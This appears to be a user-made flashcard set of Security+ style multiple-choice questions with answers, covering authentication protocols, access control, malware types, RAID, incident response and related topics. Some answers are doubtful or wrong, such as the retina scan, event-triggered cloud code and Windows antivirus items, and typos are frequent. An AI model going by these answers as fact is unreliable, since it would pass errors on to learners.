WHICH OF THE FOLLOWING IS A ROLE IN A SAML SYSTEM THAT HOLDS A DIRECTORY OF USERS AND THEIR PERMISSION? OWNER SP PRINCIPAL IDP

IdP SAML (SECURITY MARKUP LANGUAGE) = OPEN XML-BASED STD USED TO EXCHANGE AUTHENTICATION & AUTHORIZATION INFO. WORKS BY SENDING XML-BASED MSGS BET. SYSTEMS & IS TRANSPARENT TO THE END-USER ROLES: Principal: client seeking to be authenticated, typically an end-user IdP: An Identity Provider is an authentication server that holds a directory of users & their permissions SP: Service Provider is a server containing resources

WHICH OF THE FOLLOWING LANGUAGES DOES XSS TARGET? HTML PYTHON PHP JAVASCRIPT

JAVASCRIPT

YOUR ORG HAS ITS EMPLOYEES SWITCH DUTY RESPONSIBILITIES EVERY 3 MONTHS. WHAT SECURITY PRINCIPLE ARE THEY EMPLOYING? MANDATORY VACATIONS JOB ROTATION SEPARATION OF DUTIES LEAST PRIVILEGE

JOB ROTATION

Your employer demands a copy of all private keys used on devices you use for work, since regulatory requirements require them to be able to decrypt any official communications when legally requested. What is this an example of? (CRYPTOGRAPHY) KEY ESCROW KEY RECOVERY PKI HIERARCHY REVOCATION

KEY ESCROW

WHAT INJECTION ATTACK IS FREQUENTLY USED FOR NETWORK DIRECTORY SERVICES, SUCH AS ACCESSING USER NAMES AND PASSWORDS, CORPORATE EMAIL DIRECTORIES, SYSTEM OR NETWORK INFORMATION? COMMAND INJECTION NoSQL INJECTION LDAP INJECTION DLL INJECTION

LDAP INJECTION (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL)

WHAT ORDER DOES WINDOWS PROCESS GPOS IN? LOCAL - CHILD OU - SITE - DOMAIN - ORG UNIT SITE - DOMAIN - LOCAL - ORG UNIT - CHILD LOCAL - SITE - DOMAIN - ORG UNIT - CHILD OU DOMAIN - CHILD - LOCAL - ORG UNIT - SITE

LOCAL - SITE - DOMAIN - ORG UNIT - CHILD OU

Jacob is planning his organization's biometric authentication system and is considering retina scans. What concern may be raised about retina scans by others in his organization? HIGH FAR & LOW FRR HIGH FRR & LOW FAR LOW CER HIGH CER

LOW CER = LOW FALSE REJECTION RATE & LOW FALSE ACCEPTANCE RATE

WHICH OF THE FOLLOWING AREAS OF EXPERTISE DOES A FULL INCIDENT RESPONSE TEAM MIGHT INCLUDE? ASSOCIATE LEADERSHIP CULTURAL KNOWLEDGE COMMUNICATIONS

Leadership & Communications

IN WHICH ACCESS CONTROL MODEL, CAN THE ADMINISTRATORS ASSIGN SECURITY CLASSIFICATIONS, OR LABELS, TO EACH USER AND EACH RESOURCE, AND A USER CAN ONLY ACCESS A GIVEN RESOURCE IF THEIR LABELS ARE COMPATIBLE? RBAC DAC MAC TEMPORARY

MAC (MANDATORY ACCESS CONTROL) - DEV FOR MILITARY USE - COMMON IN HIGH-SECURITY ENVIRONMENTS

YOU WANT TO USE A SEC STD THAT ADDS AUTHENTICATION AND ENCRYPTION TO LAYER 2 PROTOCOLS OVER ETHERNET, SUCH AS ARP OR DHCP. WHICH OF THE FOLLOWING WILL YOU USE? MACSEC PORT SECURITY DHCP SNOOPING MAC FILTERING

MACSEC

Which of the following statements is correct regarding threat vector? (SECURITY FUNDAMENTALS) A THREAT VECTOR IS AN UNINTENTIONAL THREAT THE MECHANISM OF MINIMIZING VULNERABILITIES IS CALLED A THREAT VECTOR MALWARE IS A COMMON EXAMPLE OF A THREAT VECTOR A THREAT VECTOR REFERS TO THE PATHWAY THAT ORG TAKES TO FIND THE ATTACKERS

MALWARE IS A COMMON EXAMPLE OF A THREAT VECTOR

WHICH OF THE FOLLOWING IS A SPECIFIC PIECE OF CODE THAT ONLY RUNS WHEN TRIGGERED BY AN OUTSIDE EVENT RECEIVED FROM THE CSP PLATFORM? SOA-BASED WEB APPLICATION MICRO SERVICE CRM APPLICATION BLOB STORAGE SERVICE

MICRO SERVICE

WHAT POLICY DOCUMENT IS SOMETIMES SYNONYMOUS WITH A LETTER OF INTENT? BPA ISA MOU SLA

MOU

WHO AMONG THE FOLLOWING ARE THE INTELLIGENCE AGENCIES & DEDICATED CYBER WARFARE ORGS EMPLOYED TO ATTACK RIVSL GOVTS, BUSINESSES, POLITICAL ORGS AS THEY PERCEIVE TO BE A THREAT TO THE COUNTRY'S NATIONAL INTERESTS? (RISK MGMT) NATION-STATE ACTORS ORGANIZED CRIME HACKTIVISTS INSIDER THREATS

NATION-STATE ACTORS

A CRITICAL NETWORK SERVICE IS HOSTED ON A LEGACY SERVER RUNNING AN OBSOLETE OS, AND YOU CAN'T REPLACE IT UNTIL THE NEXT FISCAL YEAR. YOU JUST LEARNED IT IS INCREDIBLY VULNERABLE TO A NEW WORM THAT'S APPEARED ON OTHER COMPUTERS ON YOUR NETWORK, BUT YOU CAN'T UPDATE THE SERVER OR INSTALL SOFTWARE THAT WILL PROTECT IT. WHAT CAN YOU PLACE BETWEEN THE SERVER AND THE REST OF THE NETWORK TO PROTECT IT? HIDS NIPS AIRGAP FIREWALL

NIPS (NETWORK IPS)

WHICH OF THE FOLLOWING IS A US GOVT AGENCY CHARGED WITH DEVELOPING AND SUPPORTING STDS USED BY OTHER GOVT ORGS? (SECURITY FUNDAMENTALS) ISOC OWASP W3C NIST

NIST

WHICH OF THE FOLLOWING NETWORK SERVICES SYNCHRONIZES CLOCKS BETWEEN NETWORKED COMPUTERS AND DEVICES, RATHER THAN TRANSFERRING USER DATA? DNS DHCP LDAP NTP

NTP

YOUR COMPANY HAS DEVELOPED AN ONLINE GAME AND IT ASKS TO ACCESS YOUR ACCT TO POST YOUR IN-GAME ACHIEVEMENTS AS STATUS UPDATES. YOU ARE WORRIED THAT YOUR COMPANY MAY ACCESS YOUR PRIVATE MESSAGES AND PHOTOS OR CHANGE YOUR ACCT SETTINGS. WHICH OF THE FOLLOWING WILL YOU USE TO SOLVE THIS PROBLEM? ACTIVE DIRECTORY OAUTH TACACS+ SAML

OAUTH (OPEN AUTHORIZATION) STD

What is seen as the most modern & flexible way to find out if a certificate has been revoked? (CRYPTOGRAPHY) CRL CSR OCSP ASN1

OCSP - request/response protocol used over HTTP

WHAT SNMP COMPONENT IS A UNIQUE NUMBER CORRESPONDING TO AN OBJECT PROPERTY THST CAN BE MONITORED ON A MANAGED DEVICE? OID MIB MANAGER AGENT

OID (Object Identifier)

WHAT KIND OF POLICY GOVERNS A SET OF PROCESS FOR HOW AN EMPLOYEE NEEDS TO PREPARE A DEVICE TO NOIN THE PROGRAM? ONBOARDING OFF-BOARDING STORAGE SEGMENTATION ASSET TRACKING

ONBOARDING

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING PASSWORD POLICIES? - ONE WAY TO CREATE A VERY LONG PASSWORD IS BY USING A PASSPHRASE, WHICH ONLY HAS MEANING TO THE USER - PASSWORDS SHOULD BE HARD FOR THE USER TO REMEMBER, BUT EASY FOR ANYONE ELSE TO GUESS, EVEN IF THEY KNOW THE USER VERY WELL - PASSWORDS THAT HAVE BEEN CHANGED SHOULD BE REUSED - SHORTER PASSWORDS ARE STRONGER

ONE WAY TO CREATE A VERY LONG PASSWORD IS BY USING A PASSPHRASE, WHICH ONLY HAS MEANING TO THE USER -longer passwords are stronger: user-chosen passwords should be at least 8 characters, and max length should be very permissive, at least t4 characters - even if complexity isn't required, allowing users to use more character types enhances security - one way to create a very long password is by using a passphrase, which only has meaning to the user - passwords should be compared to a list of known simple/easily compromised passwords before they're approved - passwords should always be changed when there's reason to believe they've been compromised - passwords that have been changed should not be reused

WHICH OF THE FOLLOWING IS THE BEST CERTIFICATE FORMAT THAT COMMONLY USES THE WEB OF TRUST MODEL? (CRYPTOGRAPHY) OPENPGP X.509 ASN.1 BRIDGE

OPENPGP

WHICH OF THE FOLLOWING CONTROLS PRIMARILY PROTECT DATA AVAILABILITY? (SEC FUNDAMENTALS) VERSION CONTROL HASHING PATCH MGMT DIGITAL SIGNATURES

PATCH MGMT

WHICH STD DO YOU NEED TO USE WHEN HANDLING CREDIT CARD DATA? PCI DSS NIST HIPAA PKI

PCI DSS

WHICH OF THE FOLLOWING ISN'T AN EAP AUTHENTICATION METHOD, BUT RATHER A PROTOCOL THAT SECURES EAP AUTHENTICATION IN A TLS TUNNEL? EAP-SIM EAP-TLS PEAP EAP-TTLS

PEAP (PROTECTED EAP)

WHICH OF THE FOLLOWING IS THE CORRECT ORDER OF THE DEMING CYCLE? (SECURITY FUNDAMENTALS) ACT - CHECK - PLAN - DO CHECK - ACT - DO - PLAN ACT - CHECK - DO - PLAN PLAN - DO - CHECK - ACT

PLAN - DO - CHECK -ACT

YOU'VE FOUND A COMPUTER INFECTED BY A MALWARE THAT IS CHANGING IS CODE WHENEVER IT IS SPREADING IN ORDER TO EVADE DETECTION. WHAT KIND OF MALWARE IS IT? FILELESS MALWARE ARMORED VIRUS POLYMORPHIC MALWARE ROOTKIT

POLYMORPHIC MALWARE

WHAT SEC FEATURE IS ESPECIALLY IMPORTANT FOR PREVENTING ROGUE DEVICES ON THE NETWORK? LOOP PROTECTION DMZ VPN PORT SECURITY

PORT SECURITY

WHICH VPN PROTOCOL WAS INITIALLY DEVELOPED BY A VENDOR CONSORTIUM AND ENCAPSULATES PPP PACKETS OVER GRE TO PROVIDE VPN TUNNELING FEATURES? SSL/TLS L2TP/IPSEC PPTP SSH

PPTP (POINT-TO-POINT TUNNELING PROTOCOL)

WHICH OF THE FOLLOWING IS THE CORRECT ORDER OF THE INCIDENT RESPONSE PROCESS? — ERADICATION - IDENTIFICATION - CONTAINMENT - PREPARATION - INVESTIGATION - RECOVERY - FOLLOW UP — IDENTIFICATION - CONTAINMENT - PREPARATION - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP — IDENTIFICATION - PREPARATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP — PREPARATION - IDENTIFICATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP

PREPARATION - IDENTIFICATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP

WHAT KIND OF TOOL IS OFTEN USED TO CAPTURE AND ANALYZE NETWORK TRAFFIC? NETWORK MAPPER DATABASE VULNERABILITY TESTER WIRELESS ANALYZER PROTOCOL ANALYZER

PROTOCOL ANALYZER

WHICH OF THE FOLLOWING TECHNIQUES SENDS FORGED, REPLAYED, OR OTHERWISE NON-STD PACKETS TO A NETWORK APP? APPLICATION FUZZING VALIDATION FILE FORMAT FUZZING PROTOCOL FUZZING

PROTOCOL FUZZING

JOE WANTS TO ALLOW GUESTS TO USE HIS ORG'S WIRELESS NETWORK BY PROVIDING A PRESHARED KEY. WHAT SOLUTION CAN HE DEPLOY TO ALLOW USERS TO ACCESS HIS OPEN NETWORK? WI-FI EASY CONNECT PSK CAPTIVE PORTAL 802.1X

PSK (Pre-shared key)

YOU'VE TRACED SOME ANOMALOUS NETWORK ACTIVITY INFECTING THE WHOLE DEPARTMENT's COMPUTERS BY STEALING INFORMATION. THEY'RE INSTALLED AS ADD-ONS WITH LEGITIMATE FREE SOFTWARE APPS BY POPULAR DOWNLOAD SITES. WHAT KIND OF MALWARE IS IT? SPYWARE PUP BOTNET TROJAN

PUP (POTENTIALLY UNWANTED PROGRAM)

WHICH OF THE FOLLOWING TECHNIQUES IS ALSO DEFINED AS TAILGATING? PHISHING PIGGYBACKING BAITING PRETEXTING

Piggybacking

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING QUALITATIVE RISK ASSESSMENT? (RISK MGMT) - QUALITATIVE RISK ASSESSMENT RELIES ON HAVING CONCRETE FINANCIAL VALUE FOR THE IMPACT OF LOSSES, OR STRICT PERCENTAGE FOR LIKELIHOOD - QUALITATIVE RISK ASSESSMENT CAN GIVE A CLEAR COST-BENEFIT ANALYSIS FOR A GIVEN SEC CONTROL - QUALITATIVE RISK ASSESSMENT IS GENERALLY BEST SUITED FOR INTANGIBLE ASSETS - QUALITATIVE RISK ASSESSMENT ASSIGNS AN OBJECTIVE VALUE, TYPICALLY A MONETARY FIGURE TO EACH RISK

QUALITATIVE RISK ASSESSMENT IS GENERALLY BEST SUITED FOR INTANGIBLE ASSETS

YOU HAVE OBSERVED AN UNEXPECTED RESULT WHEN TEH 2 OPS ARE ATTEMPTED AT THE SAME TIME AND THE ACTIONS DO NOT OCCUR IN THE EXPECTED ORDE. WHAT TYPE OF FLAW DOES THE APPLICATION HAVE? BUFFER OVERFLOW REQUEST FORGERY RACE CONDITION INJECTION

RACE CONDITION

JOE WANTS TO IMPLEMENT AN AAA SYSTEM FOR DIAL-IN USERS TO NETWORKS. WHICH OF THE FOLLOWING IS AN AAA SYSTEM SHE COULD IMPLEMENT? SAML RADIUS LDAP OAUTH

RADIUS

WHICH OF THE FOLLOWING ALLOWS REDUNDANCY BY SAVING DATA TO MULTIPLE HARD DRIVES AT ONCE? - REDUNDANT POWER SUPPLY - BACK POWER SOURCE - NIC TEAMING - RAID

RAID (REDUNDANT ARRAY OF INDEPENDENT/INEXPENSIVE DISKS)

YOU WANT TO IMPLEMENT A MIRRORED DRIVE SOLUTION. WHAT RAID LEVEL DOES THIS DESCRIBE? RAID 0 RAID 1 RAID 5 RAID 6

RAID 1

CRYPTO-MALWARE IS A TYPE OF WHAT SORT OF MALWARE? TROJAN ROOTKIT RANSOMWARE KEYLOGGER

RANSOMWARE

WHICH OF THE FOLLOWING CONTAINS A 64-BIT ARM CPU AND SUPPORTS LINUX NATIVELY AND HAS THE RESOURCES AND HARDWARE TO RUN THE OS AND SERVICES? RTOS SYSTEM ON A CHIP FPGA RASPBERRY PI

RASPBERRY PI

Which of the following was initiallly designed as a stream cipher? (CRYPTOGRAPHY) BLOWFISH AES TWOFISH RC4

RC4

WHAT USER PERMISSIONS WOULD A LINUX FILE HAVE IF ITS PERMISSIONS ARE DISPLAYED AS ' -rwxrw-r—'? READ, WRITE, AND EXECUTE READ ONLY READ AND WRITE WRITE ONLY

READ, WRITE, AND EXECUTE (rwx) rwx = User rw = Group r = Others

WHICH OF THE FOLLOWING RELIES ON IP SPOOFING TO GENERATE OVERWHELMING TRAFFIC FROM UNRELATED HOSTS, OFTEN ONES THE TARGET WOULDN'T WANT TO BLOCK? VLAN HOPPING BLUESNARFING MALFORMED PACKETS REFLECTED ATTACK

REFLECTED ATTACK

YOU HAVE DETECTED A POTENTIAL SOCIAL ENGINEERING ATTACK BECAUSE THE RETURN EMAIL ADDRESS IS A DOMAIN ASSOCIATED WITH SCAMMERS. WHICH OF THE FOLLOWING IS A THREST INDICATOR THAT REPS THE SCENARIO IN THE BEST WAY POSSIBLE? (RISK MGMT) BEHAVIORAL RISK REGISTER REPUTATIONAL VULNERABILITY

REPUTATIONAL INDICATOR

IN WHICH OF THE FOLLOWING RISK MGMT STRATEGIES WOULD CYBERSECURITY BE USED? (RISK MGMT) RISK ACCEPTANCE RISK TRANSFERENCE RISK DETERRENCE RISK AVOIDANCE

RISK TRANSFERENCE

YOUR ORG WANTS TO IMPLEMENT AN ACCESS CONTROL SCHEME THAT SETS PERMISSIONS BASED ON WHAT THE INDIVIDUAL'S JOB REQUIRES. WHICH OF THE FOLLOWING SCHEME IS MOST SUITED TO THIS TYPE OF IMPLEMENTATION? ATTRIBUTE-BASED ACCESS CONTROL ROLE-BASED ACCESS CONTROL MANDATORY ACCESS CONTROL DISCRETIONARY ACCESS CONTROL

ROLE-BASED ACCESS CONTROL

WHAT IS THE MOST ESSENTIAL TOOL FOR SEGMENTING BROADCAST DOMAINS? VLANS SWITCHES ROUTERS BRIDGES

ROUTERS

WHICH OF THE FOLLOWING IS THE MAXIMUM EXPECTED AMOUNT OF DOWNTIME BETWEEN WHEN A SERVICE IS TAKEN OFFLINE BY A DISASTER AND WHEN ITS FUNCTIONS WILL BE FULLY RESTORED? RTO RPO MTBF MTTR

RTO (RECOVERY TIME OBJECTIVE)

WHICH ACCESS CONTROL MODEL IS USED BY NETWORK HARDWARE SUCH AS ROUTERS? MANDATORY ROLE-BASED RULE-BASED DISCRETIONARY

RULE-BASED - STATIC| DYNAMIC| TRIGGERED BY EVENTS

WHICH OF THE FOLLOWING IS USED TO MONITOR STATE CHANGES IN LARGE SCALE DISTRIBUTION SYSTEMS SUCH AS ELECTRICAL GRIDS, WASTE CONTROL SYSTEMS, AND TRANSPORTATION? DCS IOT SCADA VOIP

SCADA (SUPERVISORY CONTROL AND DATA ACQUISITION)

YOU'VE RECEIVED AN ASSORTMENT OF FILES ALONG W/ACCOMPANYING HASHES TO GUARANTEE INTEGRITY. SOME OF THE HASH VALUES ARE 256-BIT AND SOME ARE 512-BIT. ASSUMING THEY ALL USE THE SAME BASIC ALGORITHM, WHAT MIGHT IT BE? (CRYPTOGRAPHY) MD5 SHA2 SHA1 RIPEMD

SHA2

WHAT IS A RISK CALLED WHEN USING ANY DISPLAY WHERE SOMEONE CAN SEE IT? DENIAL OF SERVICE ATTACK WIRELESS ATTACK MITM ATTACK SHOULDER SURFING

SHOULDER SURFING

YOU HAVE NOTICED THAT SOMEONE READ YOUR PASSWORD FROM THE ROOM BEYOND YOU AS YOU LOG IN. WHAT TYPE OF TECHNIQUE IS USED? PIGGYBACKING DUMPSTER DIVING SHOULDER SURFING SMURFING

SHOULDER SURFING

————- IS A CONTACT-BASED SMART CARD STORING THE INTERNATIONAL MOBILE SUBSCRIBER IDENTITY (IMSI) NUMBER AND KEY ASSOCIATED WITH A MOBILE NETWORK USER CAC PIV OTP SIM

SIM (SUBSCRIBER IDENTITY MODULE)

WHICH OF THE FOLLOWING IS A TYPE OF BACKUP THAT IS USED TO QUICKLY CAPTURE THE STATE OF A SYSTEM AT A GIVEN POINT WITH A LIMITED IMPACT ON ONGOING OPS? DIFFERENTIAL FULL INCREMENTAL SNAPSHOT

SNAPSHOT

VIRTUAL PLATFORMS: SNAPSHOTS|| SANDBOXING|| SECURITY CONTROL TESTING|| PATCH COMPATIBILITY || HOST AVAILABILITY/ELASTICITY

SNAPSHOTS: EASY TO CREATE SNAPSHOT OF A VM SANDBOXING: SINCE A VM CAN ONLY ACCESS HOST RESOURCES THRU THE HYPERVISOR AND DOESN'T INTERACT DIRECTLY W/OTHER VMS. ITS EFFECTIVELY A SANDBOX ENVIRONMENT ISOLATED FROM THE REST OF THE HOST SECURITY CONTROL TESTING: VIRTUAL TEST ENVIRONMENTS ARE AN IDEAL PLACE TO THOROUGHLY TEST SECURITY CONTROLS BEFORE DEPLOYING THEM ON THRE REAL NETWORK PATCH COMPATIBILITY: A TEST VM IS ALSO USEFUL FOR TESTING AN OS/APPLICATION PATCHES TO MAKE SURE THEY DONT INTRODUCE ANY PROBLEMS HOST AVAILABILITY/ELASTICITY: ITS REASONABLY EASY TO MAINTAIN HIGH AVAILABILITY FOR SERVICES HOSTED ON A VM - AFTER ALL, ITS EASY TO TRANSFER THE VM IF THE PHYSICAL HOST HAS PROBLEMS OR NEEDS MAINTENANCE

WHICH OF THE FOLLOWING IS A SPECIAL FORM OF ATTACK USING WHICH HACKER'S EXPLOIT HUMAN PSYCHOLOGY? CROSS SITE SCRIPTING SOCIAL ENGINEERING REVERSE ENGINEERING INSECURE NETWORK

SOCIAL ENGINEERING

WHICH OF THE FOLLOWING IS USUALLY TARGETED BY NATURE WHERE THE EMAILS ARE EXCLUSIVELY DESIGNED TO TARGET ANY EXACT USER? SMISHING VISHING SPEAR PHISHING ALGO-BASED PHISHING

SPEAR PHISHING

WHICH OF THE FOLLOWING IS USED FOR SECURE REMOTE ACCESS BUT CAN ALSO CREATE PROXY CONNECTIONS TO OBSCURE YOUR NETWORK LOCATION? (RISK MGMT) CURL HPING SSH PATHPING

SSH

WHAT ALLOWS USERS TO ACCESS MANY SERVICES WITH 1 SET OF CREDS? PRINCIPLE OF LEAST PRIVILEGE FEDERATED ID MGMT REMOTE ATTESTATION SSO

SSO (SINGLE SIGN ON)

IN WHICH OF THE FOLLOWING, THE SERVER PERIODICALLY VERIFIES ITS OWN CERTIFICATE STATUS & RECEIVES A TIME-STAMPED RESPONSE SIGNED BY THE CA? (CRYPTOGRAPHY) KEY PINNING TRANSPOSITION STAPLING ESCROW

STAPLING

Which DMZ topology is displayed in the figure? Wkstn — Trusted LAN — FIREWALL——-WAN Bastion Host UTM Firewall Single Firewall Dual Firewall

Single Firewall

TACACS+ (Terminal Access Controller Access Control System) ADVANTAGES OVER RADIUS (Remote Authentication Dial-in User)

TACACS+: TCP PORT 49| ENCRYPTS ENTIRE ACCESS REQUEST PACKETS| ENTIRELY SEPARATES ALL 3 STEPS OF AAA PROCESS| SUPPORTS MORE NON-IP PROTOCOLS RADIUS: UDP (CONNECTION-LESS)| COMBOS AUTHENTICATION & AUTHORIZATION INTO SINGLE STEP

YOU WANT TO SEND THREAT INFO VIA A STD PROTOCOL SPECIFICALLY DESIGNED TO EXHANGE CYBER THREAT INFO. WHAT SHOULD YOU CHOOSE? (RISK MGMT) OPENIC STIX 2.0 STIX 1.0 TAXII

TAXII (TRUSTED AUTOMATED EXCHANGE OF INDICATOR INFO)

JOE IS TUNING HER ORGANIZATION'S FIREWALL RULES TO PREVENT IP SPOOFING. WHAT TYPE OF CONTROL IS JOE IMPLEMENTING? (SECURITY FUNDAMENTALS) Technical Physical Managerial Operational

TECHNICAL | TECHNICAL CONTROLS ENFORCE CONFIDENTIALITY, INTEGRITY, & AVAILABILITY IN DIGITAL SPACE

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING SOCIAL ENGINEERING ATTACKS? - THESE ATTACKS ARE MOST COMMONLY EITHER IN PERSON OR OVER ELECTRONIC MEDIA RATHER THAN ON THE PHONE - IT DOESN'T TAKE ADVANTAGE OF INSECURE BEHAVIORS IN THE REAL WORLD - IT DOESN'T TAKE ANY ADVANTAGE OF HUMAN BEHAVIORS TO STEAL INFO DIRECTLY - THE MOST COMMON FACTOR IN SOCIAL ENGINEERING ATTACKS IS IMPERSONATION

THE MOST COMMON FACTOR IN SOCIAL ENGINEERING ATTACKS IS IMPERSONATION

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING PRIVILEGED USERS? - THEY NEED TO BE AWARE OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN, WHAT RESPONSIBILITIES COME WITH THEM, AND THE IMPORTANCE OF NOT SHARING THEIR CREDS WITH OTHER USERS - THEY NEED TO BE REGULARLY KEPT ABROAD OF NETWORK CHANGES AND EVOLVING THREATS AND TO HAVE DETAILED SYSTEM DOCUMENTATION AVAILABLE AT ALL TIMES - THEY NEED TO BE AWARE OF THE IMPORTANCE OF SHARING THEIR CREDS WITH ITHER USERS - NEEDS ADDITIONAL FOCUS ON RECOGNIZING SOCIAL ENGINEERING ATTACKS AND PROTECTING THE ORG'S REPUTATION

THEY NEED TO BE AWARE OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN, WHAT RESPONSIBILITIES COME WITH THEM, AND THE IMPORTANCE OF NOT SHARING THEIR CREDS WITH OTHER USERS

YOUR ORG WANTS U]YOU TO VISUALLY DISPLAY INFO ABOUT THE LOCATION OF THREAT ACTORS. WHICH OF THE FOLLOWING THREAT RESEARCH TOOLS WILL YOU USE? (RISK MGMT) STIX VULNERABILITY FEED PREDICTIVE ANALYTICS THREAT MAP

THREAT MAP

WHY ARE FARADAY CAGES DEPLOYED? TO PREVENT TAILGATING TO PREVENT EMI TO ASSIST W/FIRE SUPPRESSION TO PREVENT DEGAUSSING

TO PREVENT EMI

WHY WOULD YOU CONFIGURE A PASSWORD HISTORY THAT TRACKS PREVIOUS PASSWORDS? TO PREVENT ATTACKERS FROM EASILY. RACKING PASSWORDS TO PREVENT PASSWORD REUSE TO KEEP USERS FROM CHOOSING SIMPLE PASSWORDS TO MAKE SURE USERS CHANGE THEIR PASSWORDS REGULARLY

TO PREVENT PASSWORD USE

WHICH OF THE FOLLOWING COMMANDS WILL DISPLAY THE LAST 30 LINES OF A FILE NAMES LOGFILE2.TXT? Head -n 30 logfile2.txt Tail -n 30 logfile2.txt Grep -n 30 logfile2.txt Cat -n 30 logfile2.txt

Tail -n 30 logfile2.txt

WHAT DO FAIL-SAFE/FAIL-OPEN LOCKS MEANS? GOOD FOR SAFETY AND SECURITY BAD FOR SAFETY AND SECURITY UNLOCKS WHEN POWER IS CUT LOCKS WHEN POWER IS CUT

UNLOCKS WHEN POWER IS CUT

MARK WANTS TO SECURELY ERASE ERASE THE CONTENTS OF A TAPE USED FOR BACKUPS IN HIS ORG'S TAPE LIBRARY. WHAT IS THE FASTEST SECURE ERASE METHOD WILL HE USE THAT WILL ALLOW THE TAPE TO BE REUSED? BURN THE TAPE INCINERATE THE TAPE WIPE THE TAPE BY WRITING A RANDOM PATTERN OF 1S AND 0S TO IT USE A DEGAUSSER

USE A DEGAUSSER

YOUR INTERNAL NETWORK IS PROTECTED FROM INTERNET ATTACKS BY A CISCO FIREWALL. TO IMPROVE SECURITY, YOUR SUPERVISOR SUGGESTS INSTALLING A FORTINET FIREWALL BETWEEN THE CISCO FIREWALL & THE TRUSTED LAN, THEN USING THE SPACE BETWEEN AS A PERIMETER NETWORK. WHICH SECURITY PRINCIPLES DOES THIS PROMOTE? (SECURITY FUNDAMENTALS) Security by obscurity Vendor diversity Availability Defense in depth Security by design

VENDOR DIVERSITY & DEFENSE IN DEPTH

AS PART OF MONTHLY INCIDENT RESPONSE PREPARATIONS, YOUR ORG GOES THROUGH A SAMPLE INCIDENT STEP BY STEP TO VALIDATE WHAT EACH PERSON WILL DO IN THE INCIDENT. WHAT TYPE OF EXERCISE IS THIS? ISCP CHECKLIST TEST WALKTHROUGH SIMULATION TEST

WALKTHROUGH

WHICH OF THE FOLLOWING SYSLOG SEVERITY LEVELS IS AN ERROR OR A PROBLEM CONDITION THAT IS IMMEDIATELY HARMLESS OR CORRECTABLE BUT MIGHT NEED USER REVIEW? WARNING ERROR NOTICE INFORMATIONAL

WARNING

WHAT IS THE FIRST VERSION OF WINDOWS TO INCLUDE REAL-TIME ANTIVIRUS SCANNING? WINDOWS 7 WINDOWS VISTA WINDOWS XP SERVICE PACK 2 WINDOWS 8

WINDOWS 8

WHAT KIND OF MALWARE REPLICATES ITSELF BY EXPLOITING SYSTEM VULNERABILITIES? TROJAN HORSE VIRUS WORM LOGIC BOMB

WORM

A SECURITY ANALYST IS REVIEWING A NEW WEBSITE THAT WILL SOON BE MADE PUBLICLY AVAILABLE. THE ANALYST SEES THE FOLLOWING IN THE URL: http://dev-site.UCertify.com/home/show.php?sessionID=7772554&loc=uk THE ANALYST THEN SENDS AN INTERNAL USER A LINK TO THE NEW WEBSITE FOR TESTING PURPOSES, AND WHEN THE USER CLICKS THE LINK, THE ANALYST IS ABLE TO BROWSE THE WEBSITE WITH THE FOLLOWING URL: http://dev-site.UCertify.com/home/show.php?sessionID=9899475&loc=uk WHICH OF THE FOLLOWING APPLICATION ATTACKS IS BEING TESTED? SQL INJECTION XSS XSRF BUFFER OVERFLOW

XSRF (CROSS-SITE REQUEST FORGERY)

WHICH OF THE FOLLOWING IS A PROPRIETARY WIRELESS STD MAINTAINED BY SILICON LABS AND SUPPORTS THROUGHPUT UP TO 40 KPBS OVER DISTANCES OF 10-100M BETWEEN NODES? ZWAVE ZIGBEE CAN BUS NB-IoT

Z-WAVE

WHICH OF THE FOLLOWING ALLOWS YOU TO REDIRECT WORKFLOWS THRU SAAS OFFERING FROM DIFFERENT PROVIDERS, OR TO FEED ON-PREMISES DATA COLLECTION INTO A CLOUD ANALYTICS PLATFORM? AaaS MaaS iPaaS FWaaS

iPaaS


Ensembles d'études connexes

Financial Accounting: Chapter 3-4 Practice Exam

View Set

Maternity Ch. 2, Maternity Ch. 8 Violence against women, Maternity Ch. 6 Women's health problem, Maternity Ch. 1, Maternity Ch. 3, Maternity Ch. 5, Maternity ch. 4, Maternity Ch. 7 Social Issues, Old's Maternity Ch. 10, Maternity Ch. 9

View Set

Ultimate Test Guide - biz ethics

View Set

MOS Finance and Accounting Chapter 2: Conceptual framework underlying financial reporting

View Set

The Factory System/ Effects of Industrialization Mr. Moore

View Set

Biology (college) Chapter 1-3 review

View Set

Chapter 6: Values, Ethics, and Advocacy

View Set